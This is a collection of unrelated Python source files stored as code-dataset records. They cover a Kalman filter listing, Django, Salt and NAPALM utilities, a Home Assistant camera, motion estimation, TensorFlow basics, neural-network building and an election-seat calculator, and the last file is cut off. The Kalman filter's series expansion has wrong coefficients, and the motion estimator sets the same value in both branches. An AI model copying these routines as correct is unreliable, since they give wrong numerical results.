the correct\n\t# values of the output. Note that H=0.0001 but TS=0.1.\n\tif S>=(TS-.00001):\n\t\tS=0.;\n\t\tRHOH = 0.0034*math.exp(-XH/22000.0)\n\t\tF21 =-32.2*RHOH*XDH*XDH/(44000.0*BETAH)\n\t\tF22 = RHOH*32.2*XDH/BETAH\n\t\tF23 =-32.2*RHOH*XDH*XDH/(2.0*BETAH*BETAH)\n\n\t\t\n\t\tF = np.matrix([[0, 1, 0],[F21, F22, F23],[0, 0, 0]])\n\t\t#PHIK = I + TS*F\n\t\tF2 = F*F\n\t\tF3 = F*F*F\n\t\tF4= F*F*F*F\n\t\t\n\t\tITERM =4\n\t\tif ITERM == 2:\n\t\t\tPHI = I + TS*F\n\t\tif ITERM == 3:\n\t\t\tPHI = I + TS*F + F2*(TS/2)**2\n\t\tif ITERM == 4:\n\t\t\tPHI = I + TS*F + F2*(TS/2)**2 + F3*(TS/6)**3\n\t\tif ITERM == 5:\n\t\t\tPHI = I + TS*F + F2*(TS/2)**2 + F3*(TS/6)**3 + F4*(TS/24)**4\n\t\t\t\n\t\tq_22 = F23*F23*TS*TS*TS/3.0\n\t\tq_23 = F23*TS*TS/2.0\n\t\tq_32 = q_23\n\t\tQ = np.matrix([[0, 0, 0],[0, q_22, q_23],[0, q_32, TS]])\n\t\t\t\n\t\tM=PHI*P*PHI.transpose()+PHIS*Q\n\t\tK = M*HMAT.transpose()*(inv(HMAT*M*HMAT.transpose() + R))\n\t\tP=(I-K*HMAT)*M\t\n\t\tXNOISE = GAUSS_PY(SIGMA_NOISE)\n\t\t\n\t\tif (rk == 1):\n\t\t\t# Use integration Runge-Kutta to propagate XH and XDH\n\t\t\tT_ = 0\n\t\t\twhile (T_< TS):\n\t\t\t\tk11 = dt*f1(XH,XDH,T_)\n\t\t\t\tk21 = dt*f2(XH,XDH,T_)\n\t\t\t\tk12 = dt*f1(XH+0.5*k11,XDH+0.5*k21,T_+0.5*dt)\n\t\t\t\tk22 = dt*f2(XH+0.5*k11,XDH+0.5*k21,T_+0.5*dt)\n\t\t\t\tk13 = dt*f1(XH+0.5*k12,XDH+0.5*k22,T_+0.5*dt)\n\t\t\t\tk23 = dt*f2(XH+0.5*k12,XDH+0.5*k22,T_+0.5*dt)\n\t\t\t\tk14 = dt*f1(XH+k13,XDH+k23,T_+dt)\n\t\t\t\tk24 = dt*f2(XH+k13,XDH+k23,T_+dt)\n\t\t\t\tXH = XH + (k11+2*k12+2*k13+k14)/6\n\t\t\t\tXDH = XDH + (k21+2*k22+2*k23+k24)/6\n\t\t\t\tXDB = XDH\n\t\t\t\tXB = XH\n\t\t\t\tT_ = T_+dt\n\t\telif (rk == 2):\n\t\t\t# Use Euler integration to propagate XH and XDH\t\n\t\t\tXDB= XDH+TS*f2(XH,XDH,T)\n\t\t\tXB = XH+TS*XDB\n\t\telse:\n\t\t\tHP = 0.001\n\t\t\t[XB, XDB] = PROJECT(TS,XH,XDH,BETAH,HP)\n\t\t\t \n\t\t\t\n\t\tXS = X1+XNOISE\n\t\tRES= XS-XB\n\t\tXH=XB+K[0,0]*RES\n\t\tk1.append(K[0,0])\n\t\tXDH=XDB+K[1,0]*RES\n\t\tk2.append(K[1,0])\n\t\tBETAH = BETAH +K[2,0]*RES\n\t\tERRX1=X1-XH\n\t\tSP11=math.sqrt(P[0,0])\n\t\tSP11N = -SP11\n\t\tERRX1D=X1D-XDH\n\t\tSP22=math.sqrt(P[1,1])\n\t\tSP22N = -SP22\n\t\tERRBETA=BETA-BETAH\n\t\t'''\n\t\thangoff error are error does not go to zero.\n\t\t'''\n\t\tSP33=math.sqrt(P[2,2])\n\t\tSP33N = 
-SP33\n\t\tt.append(T)\n\t\tx1.append(X1)\n\t\txs.append(XS)\n\t\tres.append(RES)\n\t\tx1_hat.append(XH)\n\t\tx1dot.append(X1D)\n\t\tx1dot_hat.append(XDH)\n\t\tx1_hat_ERR.append(ERRX1)\n\t\tsp11.append(SP11)\n\t\tsp11n.append(SP11N)\n\t\tx1dot_hat_ERR.append(ERRX1D)\n\t\tsp22.append(SP22)\n\t\tsp22n.append(SP22N)\n\t\tbeta_hat_ERR.append(ERRBETA)\n\t\tsp33.append(SP33)\n\t\tsp33n.append(SP33N)\n\t\t\n'''\nAdding process noise increases errors in estimate of altitude\nbut reduces the hangoff error \n'''\n\nplt.figure(1)\nplt.grid(True)\nplt.plot(t,x1_hat_ERR,label='x-hat', linewidth=0.6)\nplt.plot(t,sp11,label='sp11', linewidth=0.6)\nplt.plot(t,sp11n,label='sp11n', linewidth=0.6)\nplt.xlabel('Time (Sec)')\nplt.ylabel('Estimate and True Signal')\nplt.xlim(0,30)\nplt.legend()\nplt.ylim(-50,50)\n\nplt.figure(2)\nplt.grid(True)\nplt.plot(t,x1dot_hat_ERR,label='xd-hat', linewidth=0.6)\nplt.plot(t,sp22,label='sp22', linewidth=0.6)\nplt.plot(t,sp22n,label='sp22n', linewidth=0.6)\nplt.xlabel('Time (Sec)')\nplt.ylabel('Estimate and True Signal')\nplt.xlim(0,30)\nplt.legend()\nplt.ylim(-200,200)\n\nplt.figure(3)\nplt.grid(True)\nplt.plot(t,beta_hat_ERR,label='beta-hat', linewidth=0.6)\nplt.plot(t,sp33,label='sp33', linewidth=0.6)\nplt.plot(t,sp33n,label='sp33n', linewidth=0.6)\nplt.xlabel('Time (Sec)')\nplt.ylabel('Estimate and True Signal')\nplt.xlim(0,30)\nplt.legend()\nplt.ylim(-400,400)\nplt.show()\n","sub_path":"chapter8/listing_8_1.py","file_name":"listing_8_1.py","file_ext":"py","file_size_in_byte":5888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"250611024","text":"from django.core.management.base import BaseCommand\n\nfrom salt_observer.models import Minion\nfrom . import ApiCommand\n\nimport json\n\n\nclass Command(ApiCommand, BaseCommand):\n help = 'Fetch and save packagedata'\n\n def save_packages(self, api):\n packages = api.get('pkg.list_pkgs')\n upgrades = api.get('pkg.list_upgrades')\n\n for minion_fqdn, minion_packages in packages.items():\n\n minion = Minion.objects.filter(fqdn=minion_fqdn).first()\n\n minion_package_data = {}\n for minion_package_name, minion_package_version in minion_packages.items():\n if type(upgrades.get(minion_fqdn, {})) != dict:\n del upgrades[minion_fqdn]\n\n minion_package_data.update({\n minion_package_name: {\n 'version': minion_package_version,\n 'latest_version': upgrades.get(minion_fqdn, {}).get(minion_package_name, '')\n }\n })\n\n minion.update_data({'packages': minion_package_data})\n minion.save()\n\n def handle(self, *args, **kwargs):\n api = super().handle(*args, **kwargs)\n self.save_packages(api)\n api.logout()\n","sub_path":"salt_observer/management/commands/fetchpackages.py","file_name":"fetchpackages.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"173337098","text":"#!/usr/bin/env python\n\n\"\"\"\n3. NAPALM using nxos_ssh has the following data structure in one of its unit tests (the below data is in JSON format). 
\n\n{\n \"Ethernet2/1\": {\n \"ipv4\": {\n \"1.1.1.1\": {\n \"prefix_length\": 24\n }\n }\n },\n \"Ethernet2/2\": {\n \"ipv4\": {\n \"2.2.2.2\": {\n \"prefix_length\": 27\n }, \n \"3.3.3.3\": {\n \"prefix_length\": 25\n }\n }\n }, \n \"Ethernet2/3\": {\n \"ipv4\": {\n \"4.4.4.4\": {\n \"prefix_length\": 16\n }\n }, \n \"ipv6\": {\n \"fe80::2ec2:60ff:fe4f:feb2\": {\n \"prefix_length\": 64\n }, \n \"2001:db8::1\": {\n \"prefix_length\": 10\n }\n }\n }, \n \"Ethernet2/4\": {\n \"ipv6\": {\n \"fe80::2ec2:60ff:fe4f:feb2\": {\n \"prefix_length\": 64\n }, \n \"2001:11:2233::a1\": {\n \"prefix_length\": 24\n }, \n \"2001:cc11:22bb:0:2ec2:60ff:fe4f:feb2\": {\n \"prefix_length\": 64\n }\n }\n } \n}\n\nRead this JSON data in from a file.\n\nFrom this data structure extract all of the IPv4 and IPv6 addresses that are used on this NXOS device. \nFrom this data create two lists: 'ipv4_list' and 'ipv6_list'. \nThe 'ipv4_list' should be a list of all of the IPv4 addresses including prefixes; \nthe 'ipv6_list' should be a list of all of the IPv6 addresses including prefixes.\n\"\"\"\n\nimport json\nfrom pprint import pprint\n\nwith open(\"nxos_intf.json\") as f:\n data = json.load(f)\n\nipv4_list = list()\nipv6_list = list()\n\nfor a, b in data.items():\n for c, d in b.items():\n if c == \"ipv4\":\n for e, f in d.items():\n ipv4 = e\n prefix = f[\"prefix_length\"]\n ipv4_addr = ipv4 + \"/\" + str(prefix)\n ipv4_list.append(ipv4_addr)\n if c == \"ipv6\":\n for e, f in d.items():\n ipv6 = e\n prefix = f[\"prefix_length\"]\n ipv6_addr = ipv6 + \"/\" + str(prefix)\n ipv6_list.append(ipv6_addr)\n\nprint(json.dumps(ipv4_list, indent=4))\nprint(json.dumps(ipv6_list, indent=4))\n \n","sub_path":"class3/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"538511869","text":"\"\"\"\nCamera platform that receives images through HTTP POST.\n\nFor more details about this platform, please refer to the documentation\nhttps://home-assistant.io/components/camera.http_push/\n\"\"\"\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.components.camera import Camera, PLATFORM_SCHEMA\nfrom homeassistant.components.http.view import HomeAssistantView\nfrom homeassistant.const import CONF_NAME, HTTP_BAD_REQUEST\nfrom homeassistant.helpers import config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nAPI_URL = \"/api/camera_http_push/{entity_id}\"\n\nDEFAULT_NAME = 'HTTP Push Camera'\n\nBLANK_IMAGE_SIZE = (320, 240)\n\nREQUIREMENTS = ['pillow==5.0.0']\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string\n})\n\n\nasync def async_setup_platform(hass, config, async_add_devices,\n discovery_info=None):\n \"\"\"Set up the HTTP Push camera platform.\"\"\"\n cameras = [HttpPushCamera(config.get(CONF_NAME))]\n\n hass.http.register_view(CameraPushReceiver(cameras))\n\n async_add_devices(cameras)\n\n\nclass CameraPushReceiver(HomeAssistantView):\n \"\"\"Handle pushes from remote camera.\"\"\"\n\n url = API_URL\n name = 'api:camera:http_push'\n\n def __init__(self, cameras):\n \"\"\"Initialize CameraPushReceiver with camera entity.\"\"\"\n self._cameras = cameras\n\n async def post(self, request, entity_id):\n \"\"\"Accept the POST from Camera.\"\"\"\n try:\n (_camera,) = [camera for camera in self._cameras\n if camera.entity_id == entity_id]\n except ValueError:\n return self.json_message('Unknown HTTP Push Camera',\n HTTP_BAD_REQUEST)\n\n 
try:\n data = await request.post()\n _LOGGER.debug(\"Received Camera push: %s\", data['image'])\n _camera.update_image(data['image'].file.read())\n except ValueError:\n return self.json_message('Invalid POST', HTTP_BAD_REQUEST)\n\n\nclass HttpPushCamera(Camera):\n \"\"\"The representation of a HTTP Push camera.\"\"\"\n\n def __init__(self, name):\n \"\"\"Initialize http push camera component.\"\"\"\n super().__init__()\n self._name = name\n self._motion_status = False\n\n from PIL import Image\n import io\n\n image = Image.new('RGB', BLANK_IMAGE_SIZE)\n\n imgbuf = io.BytesIO()\n image.save(imgbuf, \"JPEG\")\n\n self._current_image = imgbuf.getvalue()\n\n def update_image(self, image):\n \"\"\"Update the camera image.\"\"\"\n self._current_image = image\n self.schedule_update_ha_state()\n\n def camera_image(self):\n \"\"\"Return a still image response.\"\"\"\n return self._current_image\n\n async def async_camera_image(self):\n \"\"\"Return a still image response.\"\"\"\n return self.camera_image()\n\n @property\n def name(self):\n \"\"\"Return the name of this camera.\"\"\"\n return self._name\n\n @property\n def motion_detection_enabled(self):\n \"\"\"Camera Motion Detection Status.\"\"\"\n return self._motion_status\n","sub_path":"camera/http_push.py","file_name":"http_push.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"153618105","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 2 18:30:03 2021\n\n@author: anusk\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport scipy.interpolate as spi\nfrom matplotlib import pyplot as plt\n\ndef PhaseCorrelation(anchorFrame, targetFrame):\n \n anchorFrame =np.double(anchorFrame)\n targetFrame =np.double(targetFrame)\n frame = np.dstack((anchorFrame, targetFrame))\n \n dimy = anchorFrame.shape[0]\n dimx = anchorFrame.shape[1]\n \n blockx = 16\n blocky = 16\n \n matchy=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n matchx=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n halfy=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n halfx=np.zeros([int(dimy/blocky),int(dimx/blockx)], np.double)\n \n #window de fft\n T = 32\n winv=np.arange(32)\n alpha=0\n a =(winv-(T/2))/T\n b = np.cos(alpha*np.pi*((winv-(T/2))/T))\n c = 1-np.square(2*alpha*(winv-(T/2))/T)\n window= np.array([np.sinc(a*b/c)])\n windowT = window.T\n windowT.T\n window = windowT @ window\n \n for loopi in range(2,int(dimy/blocky)):\n \n for loopj in range(2,int(dimx/blockx)):\n ybound1 = (loopi-1)*blocky\n ybound2 = loopi*blocky\n xbound1 = (loopj-1)*blockx\n xbound2 = loopj*blockx\n \n #divide frame into blocks\n previous = anchorFrame[ybound1-8:ybound2+8, xbound1-8:xbound2+8]\n block = targetFrame[ybound1-8:ybound2+8, xbound1-8:xbound2+8]\n B_prev = np.fft.fft2(previous,[blocky*2,blockx*2])\n B_curr = np.fft.fft2(block*window,[blocky*2,blockx*2])\n mul = B_curr*np.conj(B_prev)\n mag = np.abs(mul)\n mag[mag==0] = 1e-31\n C = mul/mag\n c=np.fft.fftshift(np.abs(np.fft.ifft2(C)))\n [tempy,tempx] = np.where(c==c.max())\n matchy[loopi-1,loopj-1]=tempy[0]-blocky\n matchx[loopi-1,loopj-1]=tempx[0]-blockx\n \n if tempy[0]>=1 and tempy[0]+1<=31:\n tt = np.arange(-1,2)\n ppy = np.array([c[tempy[0]-1,tempx[0]],\n c[tempy[0],tempx[0]],\n c[tempy[0]+1,tempx[0]]])\n ii=np.arange(-1,1.5,0.5)\n iiy= spi.interp1d(tt,ppy,kind=\"quadratic\", fill_value=\"extrapolate\")(ii)\n if iiy[1]>c[tempy[0],tempx[0]]:\n halfy[loopi-1,loopj-1]=-1\n elif iiy[3]>c[tempy[0],tempx[0]]:\n 
halfy[loopi-1,loopj-1]=-1\n \n if tempx[0]>=1 and tempx[0]+1<31:\n tt = np.arange(-1,2)\n ppx = np.array([c[tempy[0],tempx[0]-1],\n c[tempy[0],tempx[0]],\n c[tempy[0],tempx[0]+1]])\n ii=np.arange(-1,1.5,0.5)\n iix= spi.interp1d(tt,ppx,kind=\"quadratic\", fill_value=\"extrapolate\")(ii)\n if iix[1]>c[tempy[0],tempx[0]]:\n halfx[loopi-1,loopj-1]=-1\n elif iix[3]>c[tempy[0],tempx[0]]:\n halfx[loopi-1,loopj-1]=-1\n \n fig,ax = plt.subplots()\n ax.quiver(matchx,matchy) \n plt.show() \n \n #MC prediction\n predict = np.zeros([dimy,dimx], np.double) \n \n for loopi in range(1, int(dimy/blocky)+1):\n for loopj in range(1, int(dimx/blockx)+1):\n ybound1 = (loopi-1)*blocky\n ybound2 = loopi*blocky\n xbound1 = (loopj-1)*blockx\n xbound2 = loopj*blockx\n \n offy = -matchy[loopi-1,loopj-1]\n offx = -matchx[loopi-1,loopj-1]\n \n pred = anchorFrame[abs(int(ybound1+offy)):abs(int(ybound2+offy)), abs(int(xbound1+offx)):abs(int(xbound2+offx))]\n \n if halfy[loopi-1,loopj-1] == 1:\n average = anchorFrame[abs(int(ybound1+offy))-1:abs(int(ybound2+offy))-1,\n abs(int(xbound1+offx)):abs(int(xbound2+offx))]\n pred = 0.5*(pred+average)\n elif halfy[loopi-1,loopj-1] ==-1:\n average = anchorFrame[abs(int(ybound1+offy))+1:abs(int(ybound2+offy))+1,\n abs(int(xbound1+offx)):abs(int(xbound2+offx))]\n pred = 0.5*(pred+average)\n \n predict[ybound1:ybound2,xbound1:xbound2] = pred\n \n plt.figure()\n plt.imshow(predict,cmap='gray')\n plt.show()\n \n matchyy= matchy +0.5*halfy\n matchxx = matchx +0.5*halfx\n \n dy = matchyy[1:int(dimy/blocky)-1, 1:int(dimx/blockx)-1]\n dx = matchxx[1:int(dimy/blocky)-1, 1:int(dimx/blockx)-1]\n\n rangey = np.arange(np.min(dy), np.max(dy)+0.5,.05)\n \n print(rangey.dtype)\n\nif __name__ == \"__main__\":\n \n anchorframe = cv2.imread('foremanY69.png',0)\n targetframe = cv2.imread('foremanY72.png',0)\n PhaseCorrelation(anchorframe, targetframe)\n ","sub_path":"PracticasTDI/P8/motionstimation/PhaseCorrelation.py","file_name":"PhaseCorrelation.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"622063075","text":"from django.shortcuts import render,redirect\nfrom app01 import models\n# Book management system\n\n# Book list\ndef book_list(request):\n # Query all book records from the database\n book_list=models.Book.objects.all()\n # Return the book data to the html page\n return render(request,\"book_list.html\",{\"book_list\":book_list})\n\n\n# Add a book\ndef add_book(request):\n # GET request: fetch all publisher names\n if request.method==\"GET\":\n publisher_list=models.Publisher.objects.all()\n return render(request,\"add_book.html\",{'publisher_list':publisher_list})\n else:\n # POST request: get the new book's name and the selected publisher's ID\n new_bname=request.POST.get(\"bname\")\n new_publisher_id=request.POST.get(\"publisher\")\n # Create the newly added book in the database\n models.Book.objects.create(bname=new_bname,publisher_id=new_publisher_id)\n # Redirect back to the book list page\n return redirect(\"/book_list/\")\n\n\n# Delete a book\ndef delete_book(request):\n # Get the id of the book to delete\n del_id=request.GET.get(\"bid\")\n print(del_id)\n print(\"=\"*100)\n # Fetch the book object to delete and perform the deletion\n models.Book.objects.get(bid=del_id).delete()\n return redirect(\"/book_list/\")\n\n\n# Edit a book\ndef edit_book(request):\n if request.method==\"GET\":\n # Get all publishers\n publisher_list=models.Publisher.objects.all()\n # The id of the book to edit\n edit_id=request.GET.get(\"bid\")\n # Get the book object to edit (bid is the book-number field in the database)\n edit_book=models.Book.objects.get(bid=edit_id)\n return render(\n request,\n \"edit_book.html\",\n {\"publisher_list\":publisher_list,\"book\":edit_book}\n )\n else:\n # Get the number of the book being edited\n new_edit_id=request.POST.get(\"id\")\n # Get the book object being edited\n edit_book = 
models.Book.objects.get(bid=new_edit_id)\n # Get the edited book name (i.e. the new title)\n new_edit_name=request.POST.get(\"name\")\n # Get the edited publisher id\n new_edit_pid=request.POST.get(\"publisher\")\n # Update the book name and publisher number\n edit_book.bname=new_edit_name\n edit_book.publisher_id=new_edit_pid\n # Save\n edit_book.save()\n # Return to the updated book list page\n return redirect(\"/book_list/\")\n\n\n\n\n\n","sub_path":"app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"439130428","text":"import turtle\n\nturtle.shape('turtle')\n# Draw 10 nested squares.\nfor j in range(10):\n turtle.penup()\n turtle.goto(j*10,j*10)\n turtle.pendown()\n for i in range(4):\n turtle.right(90)\n turtle.forward(50+j*20)\n","sub_path":"pract-1/ex-4.py","file_name":"ex-4.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"476350160","text":"def func():\n # 'value' is created as a local identifier\n value = 100\n\ndef func_with_global():\n global value\n # global says to use the 'value'\n # from the global scope\n value = 100\n\nvalue = 0\nfunc()\nprint(value) # 0\n\nfunc_with_global()\nprint(value) # 100\n","sub_path":"yuripetrov.pythonanywhere.com/_downloads/05_01_08.py","file_name":"05_01_08.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"644614501","text":"# =============================================================================\n# first steps with neural nets\n# =============================================================================\n\n# these examples are from Raschka and Mirjalili (2018): Machine Learning \n# mit Python und Scikit-learn und TensorFlow, chapter 13\n\n# install the tensorflow library\n# remember to use the selected environment\nimport tensorflow as tf\n\n# =============================================================================\n# first example of a model with tensorflow\n# =============================================================================\n\n# we initialize the graph\ng = tf.Graph()\n\n# we define the parameters and the function\nwith g.as_default():\n x = tf.placeholder(dtype = tf.float32,\n shape =(None), name = \"x\")\n w = tf.Variable(2.0, name = \"weight\")\n b = tf.Variable(0.7, name = \"bias\")\n z = w * x + b\n init = tf.global_variables_initializer()\n \n# we apply the function to certain values \nwith tf.Session(graph = g) as sess:\n sess.run(init)\n for t in [1, 0.6, -1.8]:\n print(\"x = %4.1f --> z = %4.1f\"%(t, sess.run(z, feed_dict = {x : t})))\n\n# the difference to the above is in the feed dictionary \n# this structure allows faster computation \nwith tf.Session(graph = g) as sess:\n sess.run(init)\n print(sess.run(z, feed_dict = {x : [1., 0.6, -1.8]}))\n\n\n\n# =============================================================================\n# use tensorflow with arrays \n# =============================================================================\n\n# import the required packages\nimport tensorflow as tf\nimport numpy as np\n\n# we initialize the graph\ng = tf.Graph()\n\n# again we must define the required parameters and functions\nwith g.as_default():\n x = tf.placeholder(dtype = tf.float32,\n shape = (None, 2, 3),\n name = \"input_x\")\n # the placeholder \"-1\" stands for unknown input dimension\n # so generally all inputs can be reshaped by this function\n # 
after all \"reshape\", \"reduce_sum\" and \"reduce_mean\" are\n # tensorflow built in functions\n # as we see there are many more\n x2 = tf.reshape(x, shape = (-1, 6), name = \"x2\")\n xsum = tf.reduce_sum(x2, axis = 0, name = \"col_sum\")\n xmean = tf.reduce_mean(x2, axis = 0, name = \"col_mean\")\n xmax = tf.reduce_max(x2, axis = 0, name = \"col_max\")\n xmin = tf.reduce_min(x2, axis = 0, name = \"col_min\")\n\n# we call a session based on the defined parameters and functions as input\n# we define a input and evaluate it with the function\nwith tf.Session(graph = g) as sess:\n x_array = np.arange(18).reshape(3, 2, 3)\n print(\"input shape: \", x_array.shape)\n print(\"rearanged: \\n\", sess.run(x2, feed_dict = {x : x_array}))\n print(\"collumn sums: \\n\", sess.run(xsum, feed_dict = {x : x_array}))\n print(\"collumn means: \\n\", sess.run(xsum, feed_dict = {x : x_array}))\n print(\"collumn maximum: \\n\", sess.run(xmax, feed_dict = {x : x_array}))\n print(\"collumn minimum: \\n\", sess.run(xmin, feed_dict = {x : x_array}))\n\n\n\n\n\n","sub_path":"first_tf_script.py","file_name":"first_tf_script.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"274656036","text":"import os,sys,inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir) \n\n\nimport opencortex.build as oc\nimport opencortex.errorChecks as oc_check\n\n#### distribute cells for the sake of network visualization; no spatial dependence of connection probability at the moment \n\npopDict = {}\npopDict['L23PyrRS'] = [(1000, 'L23')]\npopDict['SupBasket'] = [(90, 'L23')]\npopDict['SupAxAx'] = [(90, 'L23')]\npopDict['L5TuftedPyrIB'] = [(800, 'L5')]\npopDict['L5TuftedPyrRS']=[(200,'L5')]\npopDict['L4SpinyStellate']=[(240,'L4')]\npopDict['L23PyrFRB']=[(50,'L23')]\npopDict['L6NonTuftedPyrRS']=[(500,'L6')]\npopDict['DeepAxAx']=[(100,'L6')]\npopDict['DeepBasket']=[(100,'L6')]\npopDict['DeepLTSInter']=[(100,'L6')]\npopDict['SupLTSInter']=[(90,'L23')]\npopDict['nRT']=[(100,'Thalamus')]\npopDict['TCR']=[(100,'Thalamus')]\n\n\nt1=-0\nt2=-250\nt3=-250\nt4=-200.0\nt5=-300.0\nt6=-300.0\nt7=-200.0\nt8=-200.0\n\nboundaries={}\n\nboundaries['L1']=[0,t1]\nboundaries['L23']=[t1,t1+t2+t3]\nboundaries['L4']=[t1+t2+t3,t1+t2+t3+t4]\nboundaries['L5']=[t1+t2+t3+t4,t1+t2+t3+t4+t5]\nboundaries['L6']=[t1+t2+t3+t4+t5,t1+t2+t3+t4+t5+t6]\nboundaries['Thalamus']=[t1+t2+t3+t4+t5+t6+t7,t1+t2+t3+t4+t5+t6+t7+t8]\n\nxs = [0,500]\nzs = [0,500] \n\nnml_doc, network = oc.generate_network(\"TestTraubBuildFull_winputs\")\n\n\nfor cellModel in popDict.keys():\n oc.add_cell_and_channels(nml_doc, '../NeuroML2/prototypes/Thalamocortical/%s.cell.nml'%cellModel,cellModel)\n\n\n\npopObjs=oc.add_populations_in_layers(network,boundaries,popDict,xs,zs)\n\n\n#extra_params=[{'pre':'L23PyrRS','post':'SupBasket','weights':[0.05],'delays':[5],'synComps':['NMDA']}]\n\ninput_params={'TCR':[ {'InputType':'GeneratePoissonTrains',\n 'InputTag':'PT',\n 'Layer':'Thalamus',\n 'TrainType':'persistent',\n 'Synapse':'Syn_AMPA_L6NT_TCR',\n 'AverageRate':0.05,\n 'LocationSpecific':True,\n 'FractionToTarget':1.0,\n 'TargetDict':{'dendrite_group':1000 } } ] }\n\noc_check.check_inputs(input_params,popDict)\n 
\nsynapseListInputs=oc.build_inputs(nml_doc,network,popObjs,input_params,\"../NeuroML2/prototypes/Thalamocortical/\")\n\nsynapseList,projArray=oc.build_connectivity(network,popObjs,\"Traub_conn_data.json\",\"../NeuroML2/prototypes/Thalamocortical/\") \n\nfor synapse in synapseListInputs:\n\n    if synapse in synapseList:\n        pass\n    else:\n        synapseList.append(synapse) \n\noc.add_synapses(nml_doc,'../NeuroML2/prototypes/Thalamocortical/',synapseList)\n\nnml_file_name = '%s.net.nml'%network.id\noc.save_network(nml_doc, nml_file_name, validate=True)\n\noc.generate_lems_simulation(nml_doc, \n                            network, \n                            nml_file_name, \n                            duration = 300, \n                            dt = 0.025)\n    \n","sub_path":"examples/TestTraubBuildFull_winputs.py","file_name":"TestTraubBuildFull_winputs.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"213465337","text":"# ======== Proportional Representation Calculator ========\nimport math\n\nquota = {}\nvotes = {}\nwonSeats = {}\nseats = 0\nallocatedSeats = 0\n\n\ndef dhondt(winner):\n    quota[winner] = math.floor(votes[winner] / (wonSeats[winner] + 1))\n\n\ndef altdhondt(winner):\n    quota[winner] = votes[winner] / (wonSeats[winner] + 1)\n\n\ndef websterSainteLague(winner):\n    quota[winner] = votes[winner] / ((2 * wonSeats[winner]) + 1)\n\n\ndef hareNiemeyer(winner, allVotes, seats):\n    quota[winner] = (seats * votes[winner]) / allVotes\n\n
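\n# [Editor's worked example - illustrative addition; defined but never called]\n# with votes A=100, B=60 and wonSeats starting at 1 (see the comment inside\n# main() below), A wins round one and its quota drops to floor(100/2) = 50,\n# so B (quota 60) takes round two and drops to floor(60/2) = 30.\ndef _dhondt_walkthrough():\n    v, won = {\"A\": 100, \"B\": 60}, {\"A\": 1, \"B\": 1}\n    first = math.floor(v[\"A\"] / (won[\"A\"] + 1))   # 50\n    second = math.floor(v[\"B\"] / (won[\"B\"] + 1))  # 30\n    return first, second\n\n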
def main():\n    print(\"==== PROPORTIONAL REPRESENTATION CALCULATOR ====\\n\")\n\n    while True:\n        try:\n            print(\"\\nWhat method do you want to use?\\n(1) - D'Hondt\\n(2) - Alternative D'Hondt (Without Rounding)\\n(3) - \"\n                  \"Hare-Niemeyer\\n(4) - Sainte-Laguë/Webster\\n\")\n            method = int(input(\"Enter either '1', '2', '3' or '4':\\n\"))\n\n            if method in range(1, 5):\n                break\n            else:\n                print(\"You have to enter either '1', '2', '3' or '4'!\")\n\n        except ValueError:\n            print(\"You have to enter either '1', '2', '3' or '4'!\")\n\n    while True:\n        try:\n            seats = int(input(\"How many seats are up for election?\\n\"))\n            break\n        except ValueError:\n            print(\"The amount of seats has to be a positive integer!\")\n\n    while True:\n        try:\n            amountOfParties = int(input(\"How many parties participated in the election?\\n\"))\n            break\n        except ValueError:\n            print(\"The amount of parties has to be a positive integer!\")\n\n    allVotes = 0\n\n    for x in range(amountOfParties):\n        while True:\n            try:\n                party = str(input(\"Name of Party #\" + str(x + 1) + \": \"))\n                if party not in quota:\n                    break\n                else:\n                    print(\"The name of a party must be unique!\")\n\n            except ValueError:\n                print(\"The name of a party cannot be empty!\")\n\n        while True:\n            try:\n                inputVotes = int(input(\"Amount of Votes for \" + party + \": \"))\n                break\n\n            except ValueError:\n                print(\"The amount of votes of a party has to be a positive integer!\")\n\n        allVotes = allVotes + inputVotes\n        quota[party] = inputVotes\n        votes[party] = inputVotes\n\n        # This needs to be initialized as 1 for every party to give the right results. If it starts at 0, the first\n        # party to win a seat wins two, because the quota only gets updated after they've won their first seat\n        wonSeats[party] = 1\n\n    allocatedSeats = 0\n\n    print(\"\\n==== CALCULATION ====\")\n    while allocatedSeats < seats:\n        winner = max(quota.values())\n        winnerKeys = [key for (key, value) in quota.items() if value == winner]\n\n        # If there's a tie between the quotas of at least 2 parties, the seat goes to the first party\n        winnerKey = winnerKeys[0]\n\n        # Result output\n        print(str(winnerKey) + \" wins seat #\" + str(allocatedSeats + 1) + \" with the highest quota of \" + str(\n            quota[winnerKey]))\n\n        # Calculation based on method\n        if method == 1:\n            dhondt(winnerKey)\n\n        if method == 2:\n            altdhondt(winnerKey)\n\n        if method == 3:\n            hareNiemeyer(winnerKey, allVotes, 